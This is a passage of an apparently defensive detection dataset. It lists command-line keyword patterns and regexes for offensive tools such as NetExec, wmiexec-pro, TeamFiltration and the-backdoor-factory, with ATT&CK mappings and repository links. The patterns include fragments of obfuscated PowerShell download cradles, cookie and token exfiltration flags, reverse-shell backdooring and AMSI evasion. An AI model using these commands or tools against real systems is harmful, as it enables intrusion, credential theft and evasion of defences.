*",".{0,1000}\sexec\s.{0,1000}\s\-p\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","1099" "* exec * --pid * --command 
*",".{0,1000}\sexec\s.{0,1000}\s\-\-pid\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","1100" "* exec -dll *.dll -config *.config*",".{0,1000}\sexec\s\-dll\s.{0,1000}\.dll\s\-config\s.{0,1000}\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","1102" "* exec-command -clear*",".{0,1000}\sexec\-command\s\-clear.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1103" "* exec-command -command *",".{0,1000}\sexec\-command\s\-command\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - 
DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1104" "* exec-command -shell*",".{0,1000}\sexec\-command\s\-shell.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","1105" "* --exec-method atexec*",".{0,1000}\s\-\-exec\-method\satexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1106" "* --exec-method mmcexec*",".{0,1000}\s\-\-exec\-method\smmcexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1107" "* --exec-method smbexec*",".{0,1000}\s\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1108" "* -exec-shellcode *",".{0,1000}\s\-exec\-shellcode\s.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","1109" "* -eXecut byPaSS -Noprof -w H -Co *",".{0,1000}\s\-eXecut\sbyPaSS\s\-Noprof\s\-w\sH\s\-Co\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1110" "* -eXecUT byPAss -WINDo 1 -nOpR -coMm """"& ((vARiaBlE '*mdr*').Name[3,11,2]-JoiN'')*",".{0,1000}\s\-eXecUT\sbyPAss\s\-WINDo\s1\s\-nOpR\s\-coMm\s\""\&\s\(\(vARiaBlE\s\'.{0,1000}mdr.{0,1000}\'\)\.Name\[3,11,2\]\-JoiN\'\'\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1111" "* -eXecUT byPAss -WINDo 1 -nOpR -coMm *",".{0,1000}\s\-eXecUT\sbyPAss\s\-WINDo\s1\s\-nOpR\s\-coMm\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 
- T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","1112" "* execute *NT AUTHORITY\SYSTEM*cmd /c *",".{0,1000}\sexecute\s.{0,1000}NT\sAUTHORITY\\SYSTEM.{0,1000}cmd\s\/c\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","1113" "* Execute command elevated through Run Dialog*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\sRun\sDialog.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#content","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","1114" "* Execute command elevated through task manager*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\stask\smanager.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#content","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","1115" "* execute NT AUTHORITY\SYSTEM* cmd true bypass*",".{0,1000}\sexecute\sNT\sAUTHORITY\\SYSTEM.{0,1000}\scmd\strue\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","1116" "* execute_shellcode.exe*",".{0,1000}\sexecute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1117" "* --execution false --save True --output *.bin*",".{0,1000}\s\-\-execution\sfalse\s\-\-save\sTrue\s\-\-output\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1118" "* exegol.apk*",".{0,1000}\sexegol\.apk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1119" "* exegol.py*",".{0,1000}\sexegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - 
TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1120" "* exe-selfdelete*",".{0,1000}\sexe\-selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","1121" "* --exfil --cookie-dump * --all*",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s\s.{0,1000}\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1122" "* --exfil --cookie-dump *",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1123" "* --exfil --teams --owa --owa-limit*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa\s\-\-owa\-limit.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1124" "* --exfil --teams --owa*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1125" "* --exfil --tokens * --onedrive --owa*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1126" "* --exfil --tokens * --onedrive*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","1127" "* Exfil.sh*",".{0,1000}\sExfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","1128" "* exfilGui.ps1*",".{0,1000}\sexfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","1129" "* exfiltrate.exe*",".{0,1000}\sexfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","1130" "* exocet.go *.exe*",".{0,1000}\sexocet\.go\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","1132" "* exploit_suggester.py*",".{0,1000}\sexploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - 
T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1133" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1134" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1135" "* --exploit=EfsRpc*",".{0,1000}\s\-\-exploit\=EfsRpc.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1136" "* --exploit=PrintSpoofer*",".{0,1000}\s\-\-exploit\=PrintSpoofer.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1137" 
"* --exploit=WinRM*",".{0,1000}\s\-\-exploit\=WinRM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","1138" "* Exrop(*/bin/*",".{0,1000}\sExrop\(.{0,1000}\/bin\/.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","#linux","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","1139" "* ExtensionSpoof.exe*",".{0,1000}\sExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","1140" "* extract --secrets --zsh*",".{0,1000}\sextract\s\-\-secrets\s\-\-zsh.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","1141" "* extract_wifi.exe*",".{0,1000}\sextract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1142" "* -f *.bin -e AMSI*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sAMSI.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","1146" "* -f *.bin -e Defender*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sDefender.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","1147" "* -f *.exe --encrypt xor --jmp -o *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","1163" "* -f *.exe -m onionduke -b *.dll*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1164" "* -f *.exe -m onionduke 
-b *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1165" "* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*",".{0,1000}\s\-f\s.{0,1000}\.ps1\s\-l\s3\s\-o\s.{0,1000}\.ps1\s\-v\s\-t\spowershell.{0,1000}reverse.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","1166" "* -f Find-AllVulns*",".{0,1000}\s\-f\sFind\-AllVulns.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1167" "* -f Find-PathDLLHijack*",".{0,1000}\s\-f\sFind\-PathDLLHijack.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1168" "* -f Get-DomainGroupMember* -a *-Identity *admin* 
-Recurse*",".{0,1000}\s\-f\sGet\-DomainGroupMember.{0,1000}\s\-a\s.{0,1000}\-Identity\s.{0,1000}admin.{0,1000}\s\-Recurse.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1169" "* -f Invoke-Inveigh*",".{0,1000}\s\-f\sInvoke\-Inveigh.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","1170" "* -f kirbi *",".{0,1000}\s\-f\skirbi\s.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1171" "* -f nessus.nessus *",".{0,1000}\s\-f\snessus\.nessus\s.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","1172" "* -f passw -e xlsx csv *",".{0,1000}\s\-f\spassw\s\-e\sxlsx\scsv\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1173" "* -f passw user admin account network login logon cred *",".{0,1000}\s\-f\spassw\suser\sadmin\saccount\snetwork\slogin\slogon\scred\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","1174" "* -f psexec.exe -H * -P * -s reverse_shell_tcp*",".{0,1000}\s\-f\spsexec\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1175" "* -f raw -e none -o Nova_MSG.bin*",".{0,1000}\s\-f\sraw\s\-e\snone\s\-o\sNova_MSG\.bin.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
